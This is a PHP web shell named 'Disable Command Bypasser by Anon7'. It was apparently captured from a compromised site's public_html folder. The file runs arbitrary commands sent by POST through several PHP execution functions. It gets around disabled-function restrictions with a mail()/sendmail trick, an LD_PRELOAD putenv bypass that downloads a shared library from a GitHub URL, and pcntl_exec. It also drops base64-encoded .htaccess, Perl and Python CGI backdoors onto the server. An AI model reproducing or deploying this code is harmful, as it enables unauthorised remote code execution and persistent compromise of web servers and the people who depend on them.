Your IP : 216.73.216.39

Current Path : /home/wirbesti/public_html/
Upload File :
Current File : /home/wirbesti/public_html/cmdbypass.php

<!-- Created with love by Anon7 -->
<!-- if you want to recode, dont forget to put author name please -->

<html>
<head>
	<title>Disable Command Bypasser</title>
	<?php
	if (isset($_GET['pcntl'])) {
		header("Content-Type: text/html");
		echo "<pre style='text-align: left; white-space: pre-line;'>";
		$check = file_get_contents("/tmp/pcntl.txt");
		if (empty($check)) {
			echo "Kagak Vuln / Belum Rejeki wkwk";
		} else {
			echo $check;
		}
		exit();
	} elseif (isset($_GET['putenv'])) {
		header("Content-Type: text/html");
		echo "<pre style='text-align: left; white-space: pre-line;'>";
		$check = file_get_contents("/tmp/putenv.txt");
		if (empty($check)) {
			echo "Menunggu Command Tereksekusi ...<br>(putenv Kadang Lama Tereksekusi, jadi sabar ya wkwk)";
		} else {
			echo $check;
		} exit();
	}
	?>
</head>
<style type="text/css">
	c {
		color: green;
	}
	d {
		color: red;
	}
</style>
<script type="text/javascript">
	function wkwk() {
		var cmd = document.getElementById('cmd').value;
		var checkbox = document.getElementById('base64');
		if (checkbox.checked == true) {
			document.getElementById('cmd').value = btoa(cmd);
		} else {
			document.getElementById('cmd').value = atob(cmd);
		}
	}
</script>
<font face=courier size=2>Disable Command Bypasser by Anon7 | Disable Function : [<?php $dis = @ini_get("disable_functions"); if (empty($dis)){echo "<c>NONE</c>";}else{echo "<d>".$dis."</d>";} ?>]<hr>
	<form method="post">
		Command : <input type="text" name="cmd" id="cmd" size="50">
		 | Base64<input type="checkbox" name="base64" onclick="wkwk();" id="base64"  value="base64"><br><br>
		<button name="exec" value="exec" <?php if(strpos($dis,"exec")!==false){echo "disabled";}?> >exec</button>
		<button name="passthru" value="passthru" <?php if(strpos($dis,"passthru")!==false){echo "disabled";}?>>passthru</button>
		<button name="shell_exec" value="shell_exec" <?php if(strpos($dis,"shell_exec")!==false){echo "disabled";}?>>shell_exec</button>
		<button name="system" value="system" <?php if(strpos($dis,"system")!==false){echo "disabled";}?>>system</button>
		<button name="popen" value="popen" <?php if(strpos($dis,"popen")!==false){echo "disabled";}?>>popen</button>
		<button name="proc_open" value="proc_open" <?php if(strpos($dis,"proc_open")!==false){echo "disabled";}?>>proc_open</button><br><br>
		<button name="perl" value="perl">perl</button>
		<button name="python" value="python">python</button>
		<button name="pcntl_exec" value="pcntl_exec" <?php if(!extension_loaded("pcntl")){echo "disabled";}?>>pcntl_exec</button>
		<button name="putenv" value="putenv" <?php if(strpos($dis,"putenv")!==false || strpos($dis,"error_log")!==false){echo "disabled";}?>>putenv</button>
		<button name="mail" value="mail" <?php if(strpos($dis,"mail")!==false || !file_exists("/usr/bin/sendmail")){echo "disabled";}?>>mail</button>
	</form>
<hr></font>
<?php
if (isset($_POST['cmd'])) {
ob_implicit_flush();ob_end_flush();
echo "<pre>";
if (isset($_POST['base64'])) {
	$set = base64_decode($_POST['cmd']);
	echo "Executed Command : ".htmlspecialchars($set)."<br>";
} else {
	$set = $_POST['cmd'];
	echo "Executed Command : ".htmlspecialchars($set)."<br>";
}
if (isset($_POST['exec'])) {
	exec($set, $output);
	foreach ($output as $exec) {
		echo htmlspecialchars($exec)."\n";
	}
}
if (isset($_POST['passthru'])) {
	htmlspecialchars(passthru($set));
}
if (isset($_POST['shell_exec'])) {
	echo htmlspecialchars(shell_exec($set));
}
if (isset($_POST['system'])) {
	htmlspecialchars(system($set));
}
if (isset($_POST['popen'])) {
	echo htmlspecialchars(fread(popen($set, 'r'), 8192));
	//$pop = popen($set, 'r');
	//while ($com = fgets($pop, 2048)) {
	//	echo htmlspecialchars($com);
	//}
}
if (isset($_POST['proc_open'])) {
	$process = proc_open($set, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $pipes);
	echo htmlspecialchars(stream_get_contents($pipes[1]));
}
if (isset($_POST['pcntl_exec'])) {
	$web = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";
	echo "<button onclick=\"window.open('".$web."?pcntl');\">Click To Show Output</button><hr>";
	pcntl_exec("/bin/bash", ["-c", $set." | tee /tmp/pcntl.txt"]);
}
if (isset($_POST['mail'])) {
	$cmd = $set." | tee /tmp/mail_anon.txt";
	file_put_contents('/tmp/readflag.sh', $cmd); chmod('/tmp/readflag.sh', 0777);
	mail('', '', '', '', '-H \"exec /tmp/readflag.sh\"');
	echo file_get_contents('/tmp/mail_anon.txt');
}
if (isset($_POST['putenv'])) {
	if (!file_exists("/tmp/anon.so") || filesize("/tmp/anon.so") == "0") {
		file_put_contents("/tmp/anon.so", file_get_contents("https://github.com/whoami-45/php-code/raw/main/anon.so"));
		chmod("/tmp/anon.so", 0777);
	}
	$cmd = $set." | tee /tmp/putenv.txt";
	echo "<button onclick=\"window.open('".$web."?putenv');\">Click To Show Output</button><hr>";
	putenv("LD_PRELOAD=/tmp/anon.so");
	putenv("CMD=".$cmd."");
	if (strpos($dis,"error_log")!==false) {
		mail('g','i','o','o');
	}
	error_log("a", 1);
	exit();
}
if (isset($_POST['perl'])) {
	if (!file_exists("anon7")) {
		mkdir("anon7");
	} if (!file_exists(base64_decode('YW5vbjcvLmh0YWNjZXNz')) || filesize(base64_decode('YW5vbjcvLmh0YWNjZXNz')) == "0") {
		file_put_contents(base64_decode('YW5vbjcvLmh0YWNjZXNz'), base64_decode("I0NyZWF0ZWQgYnkgQW5vbjcgQ29tbWFuZA0KT3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ0KQWRkVHlwZSBhcHBsaWNhdGlvbi94LWh0dHBkLWNnaSAuYW5vbjcNCkFkZEhhbmRsZXIgY2dpLXNjcmlwdCAuYW5vbjc="));
	} if (!file_exists(base64_decode("YW5vbjcvcGVybC5hbm9uNw==")) || filesize(base64_decode("YW5vbjcvcGVybC5hbm9uNw==")) == "0") {
		file_put_contents(base64_decode("YW5vbjcvcGVybC5hbm9uNw=="), base64_decode("IyEvdXNyL2Jpbi9wZXJsICAgLUkvdXNyL2xvY2FsL2JhbmRtaW4NCnVzZSBNSU1FOjpCYXNlNjQ7cHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7aWYoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAiUE9TVCIpe215ICgkaSwgJGtleSwgJHZhbCwgJGluKTtyZWFkKFNURElOLCAkaW4sICRFTlZ7J0NPTlRFTlRfTEVOR1RIJ30pO0BpbiA9IHNwbGl0KC8mLywgJGluKTtmb3JlYWNoICRpICgwIC4uICQjaW4peyRpblskaV0gPX4gcy9cKy8gL2c7KCRrZXksICR2YWwpID0gc3BsaXQoLz0vLCAkaW5bJGldLCAyKTska2V5ID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOyR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7JGlueyRrZXl9IC49ICJcMCIgaWYgKGRlZmluZWQoJGlueyRrZXl9KSk7JGlueyRrZXl9IC49ICR2YWw7fWlmKCRpbnsiY21kIn0pe3ByaW50IGRlY29kZV9iYXNlNjQoJGlueyJjaGVjayJ9KS4iIjtzeXN0ZW0oZGVjb2RlX2Jhc2U2NCgkaW57ImNtZCJ9KSk7cHJpbnQgIiJ9fQ=="));
		chmod(base64_decode("YW5vbjcvcGVybC5hbm9uNw=="), 0777);
	}
		$web = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";
		$web = str_replace(basename($_SERVER['PHP_SELF']), "anon7/perl.anon7", $web);
		$ekse = htmlspecialchars(file_get_contents($web, false, stream_context_create(array('http' => array('method'  => 'POST', 'header'  => 'Content-Type: application/x-www-form-urlencoded', 'content' => 'cmd='.base64_encode($set).'')))));
		if ($ekse == false) {
			$ch = curl_init();curl_setopt($ch, CURLOPT_URL,$web);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, "cmd=".base64_encode($set)."");curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_IPRESOLVE, CURL_IPRESOLVE_V4);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);echo htmlspecialchars(curl_exec($ch));curl_close ($ch);
		}
}
if (isset($_POST['python'])) {
	if (!file_exists("anon7")) {
		mkdir("anon7");
	} if (!file_exists(base64_decode('YW5vbjcvLmh0YWNjZXNz')) || filesize(base64_decode('YW5vbjcvLmh0YWNjZXNz')) == "0") {
		file_put_contents(base64_decode('YW5vbjcvLmh0YWNjZXNz'), base64_decode("I0NyZWF0ZWQgYnkgQW5vbjcgQ29tbWFuZA0KT3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ0KQWRkVHlwZSBhcHBsaWNhdGlvbi94LWh0dHBkLWNnaSAuYW5vbjcNCkFkZEhhbmRsZXIgY2dpLXNjcmlwdCAuYW5vbjc="));
	} if (!file_exists(base64_decode('YW5vbjcvcHl0aG9uLmFub243')) || filesize(base64_decode('YW5vbjcvcHl0aG9uLmFub243')) == "0") {
		file_put_contents(base64_decode('YW5vbjcvcHl0aG9uLmFub243'), base64_decode("IyEvdXNyL2Jpbi9weXRob24KI0dlbmVyYXRlZCBieSBBbm9uNwp0cnk6CiAgICBpbXBvcnQgY2dpdGI7IGNnaXRiLmVuYWJsZSgpCmV4Y2VwdDoKICAgIHBhc3MKICAgIAppbXBvcnQgb3MsIGNnaQoKcGFyYW09Y2dpLkZpZWxkU3RvcmFnZSgpCmNtZD1wYXJhbS5nZXR2YWx1ZSgiMCIpCgpwcmludCgiQ29udGVudC10eXBlOnRleHQvaHRtbFxuIikKaWYgY21kIDoKICAgIHByaW50KG9zLnBvcGVuKGNtZCkucmVhZCgpLnJlcGxhY2UoIjwiLCIiKS5yZXBsYWNlKCI+IiwiIikp"));
		chmod(base64_decode('YW5vbjcvcHl0aG9uLmFub243'), 0777);
	}
		$web = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";
		$web = str_replace(basename($_SERVER['PHP_SELF']), "anon7/python.anon7", $web);
		$ekse = htmlspecialchars(@file_get_contents($web, false, stream_context_create(array('http' => array('method'  => 'POST', 'header'  => 'Content-Type: application/x-www-form-urlencoded', 'content' => '0='.$set.'')))));
		if ($ekse == false) {
			$ch = curl_init();curl_setopt($ch, CURLOPT_URL,$web);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, "0=".$set."");curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_IPRESOLVE, CURL_IPRESOLVE_V4);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);echo htmlspecialchars(curl_exec($ch));curl_close ($ch);
		}
}
	echo "</pre><hr>";
}
?>